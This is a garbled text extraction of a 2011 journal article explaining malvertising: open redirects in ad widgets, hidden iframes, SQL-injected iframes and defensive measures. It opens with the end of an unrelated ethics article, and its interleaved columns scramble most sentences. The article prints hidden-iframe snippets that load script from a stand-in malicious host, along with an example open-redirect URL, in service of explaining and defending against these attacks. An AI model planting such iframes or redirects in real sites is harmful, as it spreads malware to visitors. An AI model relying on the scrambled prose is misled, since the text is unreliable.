Transcript of "Malvertising - Exploiting Web Advertising | Elsevier Computer Fraud and Security Journal"
FEATUREwhich he describes as “a bit basic”, will purposes by commandeering more than The next step will be to host an ongo-make in and of themselves. While he says 21,000 computers around the world. ing series of workshops over the next 12that the “unification of views” from dis- Carolina canvassed the opinions of a months or so and to circulate reportsparate industry bodies can only be a good number of information security prac- based on the outcomes to members of thething, he points out that their value to the titioners as to whether they considered working group, although other individu-industry is likely to remain limited “until the move right or wrong. The responses, als will be invited to join as appropriate.and unless businesses [rather than individual which ranged from “it’s absolutely appall- “If this gains traction and popular sup-practitioners] are made fully aware of their ing and law enforcement should throw port, we might be able to start abstractingexistence and accept and embrace them”. the book at them” to “they deserve to get out basic principles to describe what ethical “It’s a good starting point if only for an award” – which, incidentally, they later practices are and maybe write them down asdebate such as this,” he says, “but it will did – prompted him to explore what ethi- a rule set,” Carolina says. “But if we do that,be interesting to see the status of the cal guidance was currently available, most it will only be published with highlightedprinciples in a year’s time.” of which he found unhelpful. case studies as you have to have examples As a result, as of early February this and context. In my professional opinion,Ethics project year, Carolina kicked off the first in a without that, it’s not much value.” series of ethics workshops, made up of While such initiatives are, unfortu-Meanwhile, another potential step on no more than 25 IISP members. “This is nately, still rather fragmented in nature,the road to professionalisation is the an area where people are crying out for what they would appear to suggest iscreation of an initiative entitled the guidance, especially in the private sector,” that the information security industry isInformation Security Ethics Project, he says. “We want practitioners to have slowly starting to move down the pathwhich is sponsored by and housed better information so that they feel less of becoming more professionalised.within the UK’s Institute of Information exposed and better informed to make As Gillespie concludes: “Things areSecurity Professionals (IISP). hard decisions.” changing. There are lots of pockets of The idea behind the project came work being done and, while they’refrom the Institute’s general counsel, Things are changing not consistent or global, you can see aRobert Carolina, who is also a sen- day when the industry will get there –ior visiting fellow at Royal Holloway The half-day discussion centred on a series although it’s a long road yet.”University’s information security group, of hypothetical case studies that werewhere he teaches in its information secu- used to debate the right and wrong ways About the authorrity MSc programme. to respond in each scenario and, most Cath Everett is a freelance journalist who In early 2009, Carolina wrote an article importantly, why. The aim was to look for has been writing about business and tech-for Computer Weekly about the legal- points of commonality and difference in nology issues since 1992. Her special areasity – or otherwise – of the actions of the individuals’ beliefs and approaches and to of focus include information security, HR/BBC’s Click TV programme team when use those areas where opinion diverged as management and skills issues, marketingit created its own botnet for educational the basis for further discussion. and high-end software.Malvertising – exploitingweb advertisingAditya K Sood, Richard J Enbody, Michigan State UniversityOnline advertisements provide a convenient platform for spreading malware.Since ads provide a significant portion of revenue on the web, significant effort can be redirected. Of particular use tois put into attracting users to them. Malicious agents take advantage of this malicious agents is that redirection isskillful attraction and then redirect users to malicious sites that serve malware. built into online advertising so the mali- cious user only needs to co-opt a redirec-Search engines’ intimate tie-in with significant effort goes into attracting tion that is taking place. As a bonus, theadvertising also assists malicious agents: users to particular sites from which users user expects a redirection to take place, so 11April 2011 Computer Fraud & Security
FEATURE order to redirect traffic from malver- tisements that are distributed across the World Wide Web. When a user clicks on a malvertisement, the traf- fic is redirected towards a malicious domain rather the legitimate one. • Generally, no verification check can be imposed on advertisements to detect whether the redirect occurs appropriately or not. This lack of verification results from the nature of the web-advertising model that makes it difficult for a publisher to scrutinise web traffic related to ad delivery. • Attackers can also tamper with spon- sored links to distribute malicious executables directly into the system as a part of drive-by-download infection. Internet Explorer has been a popular target because of both its popularity and its ability to run custom exploits through ActiveX controls . The irony is that advertisers pay the publishers for the advertisements while the attackers exploit those same ads to spread malware. Malvertising modes Most of the web malware is triggered through web injections to exploit the vul- nerabilities in web software and domains.Figure 1: Registering a widget on a vulnerable advertising domain. Different modes of infections are used for injecting malicious advertisementsthe redirection to a malicious site is less it is hard to determine the integrity of in vulnerable domains. To appreciateof a red flag. content that is shared among different the severity and prevalence of this class Another feature of online advertis- domains across the web. of attack, the Open Web Applicationing that can be co-opted by malicious The result is that online marketing has Security Project (OWASP) recently placedagents is the dynamic delivery of ads. A opened up new avenues for profit gen- invalidated redirects and forwards in itsstandard approach is to provide HTML eration while at the same time providing 2010 ‘top 10’ list.2code snippets that are used in conjunc- a convenient platform for malware deliv-tion with normal websites in order to ery. Malvertising growth is being assisted Malvertising withembed advertisements. For example, by the following:Doubleclick.net provides millions of ads • Malicious agents can register nearly malicious widgetsthat are served to different domains as any domain and can use it as a stor- and redirectiondynamic content – that is, the content of age base for malware in order to con- The advent of Web 2.0 popularisedadvertisements can change dynamically duct drive-by-download attacks by widgets for use in advertising and trafficbased on user or content characteristics. redirecting users to their malicious redirection.3 However, flaws in the designService Level Agreements (SLA) exist domains.1 Generally, these types of of some web widgets pose high risks tobetween ad distributor and website to domains do not comply with any domains using those widgets for advertis-define appropriate content, but they are types of security or privacy standards. ing.4 As mentioned above, the redirectionneither designed for nor appropriate for • Malicious agents can use different can be co-opted by malicious users toapplying effective security. In particular, modes of malvertising infections in redirect traffic to malicious sites.12 Computer Fraud & Security April 2011
FEATUREFor example, we detected a widget vulner-ability in a popular news publisher web-site. The normal procedure is for a userto register, which allows the publisher torender news from various popular chan-nels and embed them into the user’s web-sites and blogs. However, because of flawsin the publisher’s system, it’s possible toredirect traffic. In order to install the widget, the pub-lishing domain requires certain steps tobe performed by a user to facilitate theability of the widget to include third-party content. Specifically:• The widget can only be installed after Figure 2: Installed widget. registration. The user selects the wid- get code based on the target platform – such as blogger, MySpace etc – in the vulnerable publishing domain as HTTP specification includes the iframe which the widget is to be installed. follows, where ‘outbrain.com’ is a vulner- to embed one web page into another.• Once the registration is complete, the able advertising domain and ‘xsstesting- Iframes can be used to load dynamic publisher requires the user to log in blog’ is a blog that serves malware: content for advertising. This functional- to his or her website or blog so that ity of iframes can be exploited to trigger widget installation can be completed. http://outbrain.com/most-viewed. infections. Iframes are used extensively After installation, the publisher starts action?sourceUrl=http://www. in order to bypass Same Origin Policy sending news and advertisements to xsstestingblog.blogspot.com (SOP) and launch a Cross Domain the registered user website. Attack (CDA).5,6 Attackers can easily• After the widget is embedded in the Step 3: Users who go to the widget embed hidden iframes that serve mal- user’s site, the user is able to receive thinking that they are entering the pub- vertisements in order to spread malware random content from various content lisher’s site find themselves redirected to while interacting with legitimate users. providers through a vulnerable adver- the attacker’s site. A successful attack can Usually, iframes are exploited using the tising domain that acts as an interme- be seen as a response request mechanism following procedures for running mali- diate service provider. in Figure 3. cious code: For advertising purposes, the vulner- This attack is the outcome of a design 1. Scripts in iframes are allowed to executeable publishing domain uses redirec- bug in the widget implementation. in the context of the browser process (thetion links in order to advertise on the Attackers can exploit this scenario by more powerful the context, the greaterpublisher’s website. However, web traffic generating malicious advertisements the vulnerability that can be exploited).can be easily redirected from where the (using the publisher’s name) that are 2. There is no specific security restrictionwidget is installed to any domain. This embedded with redirected URLs which on Active X object usage.shows that inclusion of the widget in exploit the design bug in the vulner- 3. Browser redirection can be done easilyany random domain can result in traffic able publishing domain in order to through iframes.redirection from a vulnerable publisher’s execute redirection towards the malicious 4. Access to local objects is not restrictedwebsite through advertising links. The domain. This shows how a vulnerable completely.attacker can exploit this scenario by per- advertising widget can be subverted by The hidden iframes used for malvertis-forming three steps: an attacker. ing are constructed as follows: Step 1: The attacker registers as alegitimate user (in order to get a widget <iframe src=“http://www.malicious.com/for inclusion in some domain) as shown mal_ad.js “ width=1 height=1 style=“visibiin Figure 1. The widget is included in Hidden iframes are one way for attack- lity:hidden;position:absolute”></iframe>the same domain as shown in Figure 2. ers to hide the objects that are used Step 2: The attacker can activate the for spreading malware. The concept <iframe src=“http://www.malicious.com/apparently dead vulnerability through of hidden infection is not new, but software_ad.js” width=0 height=0></hyperlinks by activating the URL from here we show a different variation. The iframe> 13April 2011 Computer Fraud & Security
FEATURE• Attackers update the database with malicious iframes by exploiting SQL injections in order to trigger persistent infections.• Attackers compromise the shared hosting server and use automated scripts to render malicious code on the main web page of different hosts. When a user visits a specific website,malicious banners are displayed alongwith dynamic content. Click on the ban-ner and the user is infected, or simply dis-playing the banner can lead to infection. Figure 5: WMV file is spreading malicious VbScript file. This trick can be used in conjunc-tion with SEO poisoning in which anattacker coerces a search engine to visit are becoming one of the main sources of pending on hardware buffer-overflow pro-malicious domains or hijacked websites spreading web malware. One reason for tection, which will prevent most computerthat display malicious banners. their popularity is a dearth of appropri- worms and viruses. He recently co-authored ate security procedures for content shar- a CS1 Python book, The Practice ofSolutions ing. For example, merely signing an SLA Computing using Python. does not ensure security and integrity• The design of web applications and in a shared network. There is a pressing Resources widgets should be thoroughly veri- need for rigorous security policies and • Polychronakis, Michalis; fied before allowing their use in a procedures to curb the risk of this type Mavrommatis, Panayiotis; Provos, production environment. The widget of infection. History indicates that it is Niels. ‘Ghost Turns Zombie: should be installed with appropriate impossible to get rid of malware infec- Exploring the Life Cycle of Web- access controls in order to avoid any tions completely, but continuous efforts based Malware’. Accessed Mar 2011. rogue actions. can contribute towards enhancing the <http://www.usenix.org/event/leet08/• The interface communication chan- security of our networks. tech/full_papers/polychronakis/poly- nel between an installed widget and chronakis.pdf>. a parent website should be moni- About the authors • Provos, Niels; McNamee, Dean; tored to catch the traffic redirection. Aditya K Sood is a security researcher, con- Mavrommatis, Panayiotis; Wang, Ke; Generally, the main website should sultant and PhD candidate at Michigan Modadugu, Nagendra. ‘The Ghost in not allow redirection in an open man- State University. He has worked in the the Browser: Analysis of Web-based ner without restricted control. security domain for Armorize, COSEINC Malware’. Accessed Mar 2011. <http://• Appropriate configuration should be and KPMG and founded SecNiche Security. www.usenix.org/event/hotbots07/tech/ used in shared hosting environments. He has been an active speaker at confer- full_papers/provos/provos.pdf>. The servers should be audited regularly ences such as RSA, Toorcon, Hacker Halted, • Ford, Sean; Cova, Marco; Kreugel, in order to detect any vulnerable hosts. TRISC, EuSecwest, XCON, OWASP Christopher; Vigna, Giovanni.• A live malware monitoring system AppSec, CERT-IN and has written content ‘Analyzing and Detecting Malicious should be used for dedicated and for HITB Ezine, ISSA, ISACA, Elsevier, Flash Advertisements’. Accessed Mar shared hosting servers in order to trace Hakin9 and Usenix Login. 2011. <http://www.cs.ucsb.edu/~chris/ malware infections at inception. research/doc/acsac09_flash.pdf>.• Systems should be updated with the Dr Richard Enbody is an Associate Professor • ‘Some 1.3 million malicious ads latest software and patches. in the Department of Computer Science and served daily’. SC Magazine, 18 May Engineering, Michigan State University. 2010. Accessed Mar 2011. <http://Conclusion He joined the faculty in 1987 after earn- www.scmagazineus.com/report-some- ing his PhD in Computer Science from 13-million-malicious-ads-served-We’ve covered the essential dynamics the University of Minnesota. His research daily/article/170414/>.of malvertising and the attack strategies interests are in computer security, computer • ‘Pay Per Click’. Wikipedia. Accessedused to distribute malicious advertise- architecture, web-based distance education Mar 2011. <http://en.wikipedia.org/ments across domains. Malvertisements and parallel processing. He has two patents wiki/Pay_per_click>. 15April 2011 Computer Fraud & Security